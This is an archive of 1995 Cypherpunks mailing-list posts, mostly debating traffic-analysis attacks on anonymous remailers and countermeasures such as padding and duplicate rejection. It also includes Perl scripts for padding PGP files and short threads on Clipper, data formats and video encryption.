> more working required to implement, far more cooperation between remailers,
> and far more room for failure than my idea.  (Emphasis: appear.  I've not
> seen Lance's paper, yet.  He's getting it to me.)

This is not clear to me.  My hope would be to persuade the PGP developers
(many of whom read this list) to incorporate a pad feature in future
versions so that messages can be easily rounded up to a standard size.
Alternatively the mixmaster client may include this capability.

> OTOH, you seem to be agreeing with me here.  Who hacks PGP?  Who is PGPing
> their outgoing stuff?  Don't we have to have standard packet _inside_ the
> net?  And you achieve this by using PGP?  ?????

I can see the problem with standard packets in a chaining context, that
they would shrink slightly in size as each successive remailer stripped
off its envelope.  Re-encrypting would solve this by providing more
padding.  OTOH you can actually stick padding into a PGP packet if you
know what you're doing.  I have a perl script around somewhere which will
do this.

> >I still don't quite follow this.  Exactly what attack would be possible
> >against Miron's remailer if it allowed encrypted reply blocks (as all
> >others do) which would fail if the messages were wrapped as you suggest?
>  
> The most obvious one: Eve checks messages (in vs out) for matching tails.
> If the tails match, the messages match.  The only way around this is for
> the entire message to be wrapped.  Thus, the extropian requirement.  

It is true that encrypting messages intra-remailer would prevent this
attack as far as that one remailer in the chain is concerned.  But it
seems to me that the message still suffers from this attack against the
remailer network as a whole.  This points up the fundamental problem with
this form of encrypted reply block.  They are really not secure unless
the body itself gets transformed at each step as in Chaum's model.

> When I say that the Mark I remailers are laughably easy to crack, I mean
> laughably easy.

None of this is news.  We have been discussing these attacks for years.
Even with intra-remailer encryption I think these attacks work against
the remailer net.

> Is the message a clear set of ::Request-Remail-To:?  Pull & log.
This will work when the message is heading to the net in the clear, even
if it is encrypted between nodes.

> Is the message clear, with encrypted headers?  Match, pull, and log.
You can still match the message entering and leaving the net, even if it
is encrypted within.

> Is the message encrypted separately from the headers?  Match, pull, log.
As above.

> Is the whole message encrypted?  Take the ones that are left, match the
> largest.  Match the next largest.  Match the next largest. Pull & log.
Encryption with padding between nodes would protect against size
matching, I agree.  But it is the padding which is important, not the
encryption.

> Get stuck?  Need a hint?  Resend a message.  Watch for the repeat on the
> out.
That's why Chaum identified one of the main features of a remailer being
that it would reject duplicates.  Mixmaster does some version of this,
although that needs improvement to really meet this attack.

> Alice has been hauled into court.  The Feds claim that she is the one that
> actually sent messages M1,...Mx to Bob through Chaum, even though these
> messages have varied From: (and From) lines.  As root, she cannot claim
> that this is not possible.  OTOH, if Chaum requires a match, the Feds would
> have to claim that she compromised the secret keys of all of all the
> cooresponding From: addresses.  Much tougher.

OTOH, if Alice actually has signed those messages, her jig is up pretty
good, wouldn't you say?  Do we really want to force people to use the
nets in a mode in which they can be incriminated like this by a hostile
government?

> Seriously, if a sight is being shadowed, then it is insecure.  It is to our
> advantage to know this.  You are right that we "don't care" where a message
> comes from only if we assume that the message _didn't_ come from an LEA.
> (Or a big corporation.  Some of them probably have the power to do this,
> too.)

Hell, Detweiler has the power to do this!  He's spoofed messages plenty
of times.  How do we know?  Because of remailer logging.  That's the real
threat, IMO (the logging).

> If it did, then the remailer net is under attack, and we most
> definitely _do_ care about that.

Even if a message comes from a fake address that is hardly evidence of an
attack by a powerful opponent.  It could just be an extra-paranoid
legitimate remailer user who doesn't want to extend any more trust than
necessary.

> >Although I agree with Wei Dai's mathematics, to my mind it points up the
> >importance of successful countermeasures rather than implying that the
> >remailer network is inherently insecure.  For example, if you send one
> >identical message every batch, Wei's math shows clearly that you can't be
> >traced.  Let's not get rumors started about how the remailers don't
> >work.
>  
> I'm lost here.  I thought that sending an identical message (producing
> identical output) every tick would be the equivalent to an attack.

I meant to refer to encrypted messages identical in size and otherwise
opaque, so that your apparent rate of output is constant.

> But what exactly constitutes "successful countermeasures"?  How do you
> prevent an attacker from taking over a sight, thus compromising it, w/o
> the knowlege of the operator?  How do you prevent long/short matching of
> the remailer net _as a whole_?  How do you prevent tail matching?  How do
> you prevent middle matching, for that matter?  How do you prevent the
> repeated message attack?

I was referring specifically to the correlation attack described by Wei.
The other attacks you describe need to be met by the kinds of
countermeasures we have been discussing: standard-sized messages,
remailer chains, not using encrypted reply blocks which leave message
bodies alone, rejecting matching messages.  All of these were discussed
in Chaum's 1981 paper.

> >Do you see your suggestion as protecting against Wei's in/out correlation
> >attack?  
>  
> Yes!  Well, not by itself.  My suggestions about "rational use of garbage"
> do that.  If Bob recieves x messages each tick, 0 to x of which are real,
> Eve is hosed--if all messages are standard sized & encrypted!.  Eve is even
> more hosed if the x messages are concatenated & superencrypted.  If Alice
> sends y messages each tick, Eve is hosed.  Even more so if the messages are
> concatenated & superencrypted.

How can Bob arrange to receive a constant number of messages each tick?
Do all his messages come from one remailer?  Or do all of the remailers
which might send to him check among themselves before sending to him so
they can mutually know how many fake messages to send?

IMO the real solution to the correlation attack is to have a constant
message generation rate.  That is sufficient.  Solutions to the other
attacks mentioned in Chaum are described in Chaum.  (This attack was not
described in Chaum's paper.)

> >Of course it was Chaum himself in his 1981 paper (which I think is available
> >from the CP FTP site) who described the duplicate-message attack.  I don't
> >see that inter-remailing encryption helps much, because the attacker can
> >still notice that whenever they inject message A, _something_ goes to
> >Bob.  The real solution, as Chaum pointed out, is that the remailer must
> >reject duplicate messages, even when separated by days.  Doing this without
> >keeping a database of all messages ever sent is left as an exercise.
> >
>  
> I disagree.  If identical input to Chaum does not produce identical output
> to Bob, how does Eve coorelate them?  Repeating, she can match the top of
> the body of messages, so random tails reveal the actual encrypted message,
> for whatever that is worth.

I'm not sure what you mean by "matching the top of the body of messages".
Are you referring to an encrypted reply block, which might be the same
for two different messages to the same user?  Or are you suggesting that
messages would have some headers or some other structures at their top
which would be preserved through a remailer?

> And if Bob receivs x packets per tick, or a BIG packet every tick, how does
> Eve trace it?

If the input to Bob really can be made constant across the whole remailer
net then this does seem to largely protect against duplicate-message
insertion, in conjunction with the intra-remailer encryption.  However it
would apparently also be necessary for every remailer to send a constant
number of packets to every other remailer.  Otherwise a bolus of
duplicates into one remailer would all leave to go to the next remailer
at once and would show up.  This means that the net as a whole has to
carry a constant traffic load on all inter-node links, which could mean a
large cost in bandwidth load.  I still think that rejecting matching
messages is a better solution.

> >Another aspect worth mentioning is that message splitting can make the
> >kinds of statistical correlations that Wei Dai was looking at more of
> >a danger. 
>  
> More than being the ONLY file in the net of your (approximate) size?

No, of course message size standardization is a necessary step.  This has
been recognized for 15 years.

> >          It's one thing if I send a message along with thousands of
> >other people, and Bob gets a message along with everyone else.  But if I
> >send 10 messages and Bob gets 10 from that batch, that fact alone can
> >help to link us up.  So splitting my big message into 10 standard ones
> >isn't that great if they're all sent at once.  Ideally you'd want to
> >dribble them out at some standard rate, a rate at which you always send
> >a message whether you have something to send or not.  But this may introduce
> >unacceptable latency.
>  
> "Dribble them out at some standard rate".  Yes.  y packets per tick.  Set y
> equal to your average number of real packets per tick, plus 3 standard
> deviations.  Since you are chaining, the latency of you input will be less
> than the latency of the remailernet.

OK, but chances are your average number of real packets per tick is < 1,
e.g. if a tick is a few hours and you only send one or two messages
a day.  So when you do need to send that 500KB GIF it's going to take a
lot of ticks.

I would sum up by agreeing with several points: the need for standard
message sizes, and for a standard rate of message output.  I am neutral
on whether a remailer may want to super-encrypt a message to the next
link in the chain (whether a remailer or an end user) if it happens to
have a key handy.  I don't see any harm in this and the remailer
software will already handle this transparently on the receiving end.
I disagree with the idea of remailers checking signatures.  I don't
agree that inter-node remailer encryption provides significantly more
protection than padding.  I think that encrypted reply blocks are
unsafe even with inter-node remailer encryption.  See Chaum's paper for
ways that encrypted reply blocks can be used safely.  We have also had
some suggestions here for modifications to Chaum's method.  And I don't
see how you can arrange to receive a constant load from the net without
a highly centralized system, which would have its own dangers.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLzCGHRnMLJtOy9MBAQEzlwH/XUYi0mhSUl0Dd4hMp/dE9KFEDQd3jNQs
Zby7ZIDl3qQn1EK1f81pLSHUYdQgGflMrMaDS9QTrRXSR/mYqx3HeQ==
=ZyWU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 1 Feb 95 20:35:08 PST
To: jltocher@CCGATE.HAC.COM
Subject: Re: Clipper Revived?
In-Reply-To: <9501017916.AA791667001@CCGATE.HAC.COM>
Message-ID: <199502020434.XAA04359@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
>      From Edupage:
>      
>      REPLACEMENT FOR CLIPPER
>      AT&T and VLSI Technology Inc. will collaborate to develop microchips 
>      that use a triple-strength version of DES (data encryption standard), 
>      which previously had been rejected by the National Security Agency. 
>      VLSI is the designated contractor to make the government-favored 
>      Clipper chips, but this latest announcement reveals their doubts over 
>      whether there's a market for the Clipper. "These companies have 
>      basically made the determination that Clipper is dead and there's 
>      going to be the proliferation of encryption anyway, so they might as 
>      well take advantage of it," says one observer, who predicts the market 
>      for such technology "could reach hundreds of millions" of dollars in 
>      annual sales by the end of the decade. (Wall Street Journal 1/31/95 
>      A3)

So, the question is, are these chips escrowed like Clipper (ie, are they
abandoning the standard because the phones are awful)? Or are they abandon-
ing the escrowed encryption altogether?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 1 Feb 95 20:48:07 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Fundamental Question?
In-Reply-To: <199502020400.XAA03916@libws2.ic.sunysb.edu>
Message-ID: <9502020446.AA06471@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 1 Feb 95 23:00:18 EST
    From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>

    Well, it's happened in the past. Doesn't mean Usenet is perfect for it,
    since nobody wants to sift through several thousand messages a day for
    messages encrypted to him/her.

It's easy to automate and you are incorrect in saying that nobody does
it.  alt.anonymous.messages was created as an implementation of an
anonymous message pool.  I wouldn't go so far as to say that it's
perfect, but it's simple and it works.  If you post a message
encrypted for my public key and include my name and/or my key id in
the subject, I'll get it.  And, no, I'm not the only one who uses it.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Thu, 2 Feb 95 06:09:53 PST
To: cypherpunks@toad.com
Subject: Frothing remailers and trust
Message-ID: <199502020934.AA25847@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

kevin@elvis.wicat.com writes:

> It strikes me as critical; right now, a user has to choose to trust a
> set of remailers, given no assistance other than a list of "reliable"
> ones. Given an extended web of trust between remailers, the user can
> choose to trust one remailer (I have no idea how to make this process
> more palatable) and immediately gain the security of a large web of
> remailers (maybe you are right about that instant gratification
> thing...)

For what it's worth, I'm a remailer operator and I don't know any of
the other operators well enough to say that I'm sure that they're
trustable with respect to preserving privacy. (no offense intended.) 
I do, for the most part, trust them to forward almost all messages
but my conclusion is based in large part on Raph's list. Absent that
list, I don't think I'd have enough information on delivery reliability
to comment about that either. This "web of trust" thing sounds nice but
I can't participate because I don't know the other people involved. I 
think other remailer operators may be in a similar situation.

Your scheme seems to conflate two tasks/roles I think are separable -
remailing messages and specifying a trustable path for messages to 
take. The latter requires more information than I have - but it is
information someone could gather. I think it'd be possible for someone
to perform "remailer audits", and then report their findings. Some
part of that report might be in the form of a "Anon-To:" chain,
or probabilites for creating your own chain of messages; or maybe
the auditor would serve as a first-hop-but-never-the-last remailer,
passing the message along to remailers it believes to be reliable and
trustworthy. Premail seems to be a step in this direction, but it
chooses hops on the basis of reliability, not reliability + privacy.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzCm8X3YhjZY3fMNAQEjnwP/T//KwPuvnzlRYgV8MgltJIaisM78zMjU
J+Q+ARuvBudBS9ah8Z2p/MtxClj6nBYXEMFWtqwQbICBzDwxfpQAwahz5Vlay3qi
QouRKx0ZJonvdi1LpIYYS8ElH8SdWEERMItfDyFDe2HDjFTXjL6fUbrIyLBvdzdl
PCSmID/WYq0=
=ukpf
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 2 Feb 95 06:45:22 PST
To: cypherpunks@toad.com
Subject: Remailer encryption module
In-Reply-To: <Pine.3.89.9502011857.B8923-0100000@jake.bga.com>
Message-ID: <199502021444.GAA07493@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Nathan Zook <nzook@bga.com>

   I also believe that hacking PGP is a bad thing (tm), because it means that
   every time an upgrade comes out, it will need to be re-hacked, and once you
   start hacking, when do you stop?

I agree.  PGP just does not have the support for the encryption
required for mixing remailers.  These deficiencies have been known for
about two years at this point and still nothing has happened.  I
expect this not to change anytime soon.

That means that we have to replace PGP as the encryption module for
remailers.  The first thing to do is to design a data format which
supports what the remailers need now, and nothing speculative.  Since
this data format has a single purpose, we can make new revisions more
easily than for a general purpose package.

Once we get a data format, implementations will follow.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 2 Feb 95 08:36:40 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
In-Reply-To: <Pine.3.89.9502011857.B8923-0100000@jake.bga.com>
Message-ID: <199502021635.IAA07634@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Nathan Zook <nzook@bga.com>

   When I say that the Mark I remailers are laughably easy to crack, I mean
   laughably easy.

By whom?  I am hearing a general denunciation of the current remailer
system.  These blanket denials are false on their face, because they
are not true in every circumstance.

   The only reason that our systems are actually able to do any good is that
   our threat model _is not_ an LEA--with government resources, and government
   patience.

_Our_ threat model?

There is not one threat model.  Each person has their own threat model
and their own desired level of security.  An individual also desires
more security for some messages than others.  The current remailer
network is good for some purposes and bad for others.

Every evaluation of security _must_ include the nature of the security
desired, because there is no single concept called "security" which is
the same in every situation.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 2 Feb 95 08:48:23 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
In-Reply-To: <9502021453.AA28522@snark.imsi.com>
Message-ID: <199502021647.IAA07663@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Perry E. Metzger" <perry@imsi.com>

   > Once we get a data format, implementations will follow.

   The obvious data format is MIME's "Security Multiparts".

That's not a complete answer.  That's kind of the obvious package, but
it addresses nothing of the interior.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 2 Feb 95 08:49:39 PST
To: cypherpunks@toad.com
Subject: Adding padding to PGP files
Message-ID: <199502021648.IAA05417@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here are a couple of perl scripts I wrote last year to add padding to PGP
encrypted files.  The usage would be:

perl pgppadt.pl filename bytestoadd

The output file is filename.pad.

It only works on binary ".pgp" public-key encrypted files (not ascii armored
files).  So there would be some work needed to make it a really useful tool.
It would also be better to use a strong source of random numbers.  I
think Carl Ellison recently posted some tools that could help with this.
The two files are pgppad.pl, which does the work, and pgppadt.pl, a very
simple test driver to show how to use it.  They are in a shar archive.

Hal

---------------cut here----------------
#!/bin/sh
# to extract, remove the header and type "sh filename"
if `test ! -s ./pgppad.pl`
then
echo "writing ./pgppad.pl"
cat > ./pgppad.pl << '\End\Of\Shar\'
# Perl module to allow padding and some other manipulation of PGP
# files.
#
# Include this with the statement:
# require 'pgppad.pl'
#
# 10/16/93
# Hal Finney


# Read a PGP Cipher Type Byte and the following length.
# One argument: file to read from
# Returns several things, in this order:
# CTB, with the length information removed, as a number.
# Length of following packet.
# Name of this kind of packet, made up, see list below.
# Packed CTB/length packet, suitable for writing out.
# Returns an empty string on error.
sub read_ctb {
    local($file) = @_;
    local($ctb, $length, $name, $rctb, $rlength, $lengthlength);

    if (read ($file, $rctb, 1) != 1) {		# Raw ctb
	return "";
    }
    $ctb = unpack ("C", $rctb);
    if ($ctb < 128) {
	return "";		# Must have high bit set
    }
    $lengthlength = $ctb % 4;
    $ctb -= $lengthlength;
    if ($lengthlength == 0) {
	$lengthlength = 1;
    } elsif ($lengthlength == 1) {
	$lengthlength = 2;
    } elsif ($lengthlength == 2) {
	$lengthlength = 4;
    } else {
	$lengthlength = 0;
	$length = -1;	# Unknown length
    }
    if (read ($file, $rlength, $lengthlength) != $lengthlength) {
	return "";
    }
    if ($lengthlength==1) {
	$length = unpack("C", $rlength);
    } elsif ($lengthlength==2) {
	$length = unpack("n", $rlength);
    } elsif ($lengthlength==4) {
	$length = unpack("N", $rlength);
    }
    $rctb = pack ("C a".$lengthlength, $rctb, $rlength);  # Packed data
    if ($ctb==0x84) {
	$name = "pubkey header";
    } elsif ($ctb==0x88) {
	$name = "signature";
    } elsif ($ctb==0x8c) {
	$name = "message digest";
    } elsif ($ctb==0x94) {
	$name = "secret key";
    } elsif ($ctb==0x98) {
	$name = "public key";
    } elsif ($ctb==0xa0) {
	$name = "compressed";
    } elsif ($ctb==0xa4) {
	$name = "conventional encrypted";
    } elsif ($ctb==0xa8) {
	$name = "plaintext";
    } elsif ($ctb==0xb0) {
	$name = "trust";
    } elsif ($ctb==0xb4) {
	$name = "user id";
    } elsif ($ctb==0xb8) {
	$name = "comment";
    } else {
	return "";
    }
    return ($ctb, $length, $name, $rctb);
}

# Write a CTB and length field out.
# 3 arguments: file handle, ctb value, and length in bytes.
# No return value.
# Length gets output as 1, 2, or 4 bytes, the smallest in which it
# will fit.
# If length is negative we output no length field, but an "indefinite
# length" code is added to ctb.
sub write_ctb {
    local($file, $ctb, $length) = @_;
    local($rctb);

    $ctb = $ctb - ($ctb % 4);	# Be sure 2 low bits are clear
    if ($length < 0) {
	$rctb = pack ("C", $ctb+3);		# Packed data
    } elsif ($length > 65535) {
	$rctb = pack ("C N", $ctb+2, $length);  # Packed data
    } elsif ($length > 255) {
	$rctb = pack ("C n", $ctb+1, $length);  # Packed data
    } else {
	$rctb = pack ("C C", $ctb+0, $length);  # Packed data
    }
    print $file $rctb;
}

# This entry point always outputs a 4-byte count.  Length must be > 0.
# Otherwise like write_ctb.
sub write_ctb_4 {
    local($file, $ctb, $length) = @_;
    local($rctb);

    $ctb = $ctb - ($ctb % 4);	# Be sure 2 low bits are clear
    if ($length < 0) {
	die ("write_ctb_4 called with negative length\n");
    }
    $rctb = pack ("C N", $ctb+2, $length);  # Packed data
    print $file $rctb;
}


# Pad a PGP public-key-encrypted file to the specified length.
# Arguments: input file handle; output file handle; new size.
# Returns negative value on error.  See the code for what the
# different values mean.
# Returns 0 on success.
sub pgppad {
    local($infile, $outfile, $size) = @_;
    local($ctb, $length, $name, $rctb, $insize, $buf);

    # Read ctb & length of pubkey header
    ($ctb, $len, $name, $rctb) = &read_ctb($infile);
    if ($ctb == 0) {
	return -1;	# Error
    }
    if ($name ne "pubkey header") {
	return -2;	# Error
    }
    if ($len < 0) {
	return -3;	# Error
    }

    $insize = length($rctb) + $len;

    # Read packet of pubkey header
    if (read ($infile, $data, $len) != $len) {
	return -3;
    }

    # Write out pubkey header, unchanged
    &write_ctb($outfile, $ctb, $len);
    print $outfile $data;

    # Read ctb and length of conventional packet
    ($ctb, $len, $name, $rctb) = &read_ctb($infile);
    if ($ctb == 0) {
	return -4;	# Error
    }
    if ($name ne "conventional encrypted") {
	return -5;	# Error
    }

    # Calculate size of outgoing conventional packet.
    # Assume rctb won't change size; it may grow by 1 or 2 in some
    # rather rare cases, in which case we'll be a byte or two too big.
    $size -= $insize + length($rctb);
    if ($size < $len) {
	return -6;	# Error
    }

    # Output CTB with new length
    &write_ctb_4($outfile, $ctb, $size);

    # Copy remainder of input file
    while (read ($infile, $buf, 32768)) {
	print $outfile $buf;
    }

    # Note that this random number generator is probably not
    # cryptographically strong.
    srand (time|$$);
    while ($len < $size) {
	print $outfile pack ("C", int(rand(256)));
	++$len;
    }

    return 0;		# Success
}

1;	# Non-zero return for 'require'
\End\Of\Shar\
else
  echo "will not over write ./pgppad.pl"
fi
if `test ! -s ./pgppadt.pl`
then
echo "writing ./pgppadt.pl"
cat > ./pgppadt.pl << '\End\Of\Shar\'
# Test program for pgppad.pl, showing how to use it.
require 'pgppad.pl';

open (IN, $ARGV[0]) || die ("Couldn't open $ARGV[0]\n");
open (OUT, ">$ARGV[0].pad") || die ("Couldn't create $ARGV[0].pad\n");

$padding = $ARGV[1];

@stat = stat(IN);
$size = $stat[7];
print "Input file $ARGV[0] has size $size bytes\n";
print "Output file $ARGV[0].pad will have size ".$size+$padding." bytes\n";

if (($code = &pgppad (IN, OUT, $size+$padding)) < 0) {
    die ("pgppad returns code $code\n");
}

close (IN);
close (OUT);
print ("Done\n");

\End\Of\Shar\
else
  echo "will not over write ./pgppadt.pl"
fi
echo "Finished archive 1 of 1"
exit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody@eniac.ac.siue.edu (Anonymous)
Date: Thu, 2 Feb 95 07:04:00 PST
To: cypherpunks@toad.com
Subject: How much entropy in a key press?
Message-ID: <199502021456.IAA01951@eniac.ac.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone tell me how many bits of entropy there are per 7-bit ASCII
character.  More specifically, a program wishes to generate a session
key by prompting the user to type N random key presses.  The characters
entered are hashed down to 128 bits by MD5 for subsequent use as a key.

What should the value of N be, such that the entropy of the user's
string does not unnecessarily exceed the entropy of the hash?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allan Bailey <allan@elvis.tamu.edu>
Date: Thu, 2 Feb 95 07:08:49 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
In-Reply-To: <199502021444.GAA07493@largo.remailer.net>
Message-ID: <9502021508.AA28912@elvis.tamu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>    From: Nathan Zook <nzook@bga.com>
>    I also believe that hacking PGP is a bad thing (tm), because it means that
>    every time an upgrade comes out, it will need to be re-hacked, and once you
>    start hacking, when do you stop?

Sounds like the UNIX philosophy to me.  :) 

> I agree.  PGP just does not have the support for the encryption
[...]
> That means that we have to replace PGP as the encryption module for
> remailers.  The first thing to do is to design a data format which
> supports what the remailers need now, and nothing speculative.  Since
> this data format has a single purpose, we can make new revisions more
> easily than for a general purpose package.
> 
> Once we get a data format, implementations will follow.

Isn't this what the forthcoming PGP RFC is about?  Also, what about
the PEM "standard"?  If remailers agree to follow one or more of those
standard data format specifications, then someone could just
ripup PGP and implement modules to produce those data formats.

Consider what CP did with his(her?) PGPTools kit.  As long as we have
an agreeable dataformat "standard", the implementation becomes
irrelevant.  

Maybe I'm just confused and not following the thread closely
enough....

- --
Allan Bailey, allan@elvis.tamu.edu        | "Freedom is not free."  _O_
Senlima Diverseco je Senlimaj Kombinajxoj.| allan.bailey@tamu.edu    |
KC5KSF                                    |nefud-the-delirious@tamu.edu
GCS w+ v-/+ C++++ U@$ P+++ L++ E++ N++ po--- Y++ b++

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzD1ghDxfDCMTq7JAQH9SgQA1K0i/PndcdaZFHkRwP2IrWbMihXvCTRc
0G0xf3GUH4KLlR5HC/qUBurvreoRCF2PjM6cDpx1Ao2pRbB/jeiRINC/5OuhZtrJ
A1KpWN51XR2c4BXRTxXvNGCUMzzH7B8uLjR01n3EWabHljoKX8HHwWKKXTe5S/1Q
AQlh00/0iA0=
=+b0t
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 2 Feb 95 09:46:29 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
Message-ID: <199502021745.JAA10726@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Perry E. Metzger" <perry@imsi.com>
> Eric Hughes says:
> > 
> > Once we get a data format, implementations will follow.
> > 
> 
> The obvious data format is MIME's "Security Multiparts".
> 
> Perry

For those wishing to follow this debate, here is a URL for this document:

<URL:http://info.internet.isi.edu/in-drafts/files/draft-ietf-pem-sigenc-03.txt>

I had trouble finding it since the filename does not contain "mime" or
"security".

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 2 Feb 95 06:53:24 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Remailer encryption module
In-Reply-To: <199502021444.GAA07493@largo.remailer.net>
Message-ID: <9502021453.AA28522@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
> 
> Once we get a data format, implementations will follow.
> 

The obvious data format is MIME's "Security Multiparts".

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Thu, 2 Feb 95 08:18:34 PST
To: mcip@mcfeeley.cc.utexas.edu
Subject: Video encryption & QTC
Message-ID: <199502021617.AA27746@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[ for cypherpunks: Apple's now beta testing a video conferencing
product called QuickTime Conferencing, or QTC. The Mac crypto
interface list (mcip@feeley.cc.utexas.edu) started a discussion on
video encryption, hence this crosspost. Feel free to chime in. ]

Here are a couple of additional things to consider.

This is a pretty classic application for stream ciphers. Since QTC is
transport-independent (and I'd bet it's using OpenTransport calls,
too), I'm assuming that QTC is using streams for video data, and that
any packetization happens at the transport layer. Just before you call
UDPSend(), ATPSend(), or whatever, just whack that outgoing block
through the crypto function and off you go.

As mentioned, RC4 might be a good choice. It's fast, plus Apple's
already licensed it. It probably provides adequate tactical security,
but as Adam pointed out, it has not been well analyzed in the open
literature. However, there are many other stream ciphers out there:
Diamond, Blowfish, RC5, etc. My gut feel is that RC4 is probably
adequately secure with a 128-bit key; then Apple can dumb down to 40
bits for export approval. After all, they're not likely to build a
product which they can't export.

What about using a PCMCIA card like the National Semi Persona 100? It
includes RSA signatures & verification, Diffie-Hellman key exchange (I
think) and single DES; future versions will include 3DES and IDEA.
Hardware encryption is fast, fast, fast. Don't forget AT&T's recent
announcement of a similar product which does 3DES.

One MCIP reader proposed just using PGP: RSA the session key and send
it along. IMHO Diffie-Hellman is a better way to do this. Rather than
using the PGP metaphor, where RSAing the session key allows you to
send the session key as part of the message, DH allows you to
establish the session key over an insecure channel, then start sending
messages.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
                  ### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzEFkKfb4pLe9tolAQEtEAP/bxEHw+fwPaJJPyHaRRtuZqlxmzvEyD+w
5cmB9c75gzkY9SpSSLkbtawwUjCCiKynMAX76uSRaDRkVeTILelJ3gvdguRMS3Id
MYQI162mPvCN+lTvsMoXVJAdZzC14WE9JE0t9FC+ovYE8M+/yZ16EGEnvtWbnNYQ
pO8GkvNpR+g=
=n3fX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat%vm1.spcs.uma.thurman.edu@vm1.spcs.umn.edu
Date: Thu, 2 Feb 95 09:23:33 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers, the advertising and pinging problems
Message-ID: <9502021723.AA10432@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


jrochkin@cs.oberlin.edu (Jonathan Rochkind) wrote:

>        ++Mail ping. Non-IP, simple, slow. ++
> A mail ping simply consists of sending a message to a remailer with a
> Request-Resending-To: yourself.  When you get it back, you know the
> remailer is alive.
> This has the advantage that it's hard for the remailer
> to trick you, even if it is an evil NSA remailer that wants you
> to believe it is alive, even though it really throws messages in
> in the trash. It can't differentuate between your "ping"
> (to be returned) and a normal message (to be thrown in the trash).

Sure it can.

   if (message_origin==request-resending-to)
     forward_message;

To get around this you would have to chain, thereby relying on
an additional remailer. Of course your origin and resend addresses
could become are different through net.sorcery, but to rely on
existing (and most likely transient) security loopholes are
unsound foundations to construct a persistent reliable remailer net.

Of course, clever Evil Remailer (tm) operatives might have their
machines work *most* of the time, and have more than one, so that
the entire network of remailers *seems* unreliable, or subtlely mangle
encrypted messages so that the ball drops somewhere else.

----------------------------------------------------------------------
P M Dierking | "Emptiness is consistent with everything" --Nagarjuna




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 2 Feb 95 15:44:26 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
In-Reply-To: <9502021508.AA28912@elvis.tamu.edu>
Message-ID: <199502021935.LAA07891@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Allan Bailey <allan@elvis.tamu.edu>

   [re: not using PGP for remailers]

   Isn't this what the forthcoming PGP RFC is about?  

Not to my knowledge.  As I understand it, they're just trying to
standardize a PGP format by documenting what the code can actually
handle and what was already planned into it.

   Also, what about the PEM "standard"?

PEM carries too much identification on the outside of the encryption
wrapper to be of good practical use against traffic analysis for
regular mail, much less remailer mail.

   Consider what CP did with his(her?) PGPTools kit.  As long as we have
   an agreeable dataformat "standard", the implementation becomes
   irrelevant.  

I expect someone to have library come out that does the format.  The
format need not be very complicated.  Getting rid of all the key
distribution features makes a format much easier indeed.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
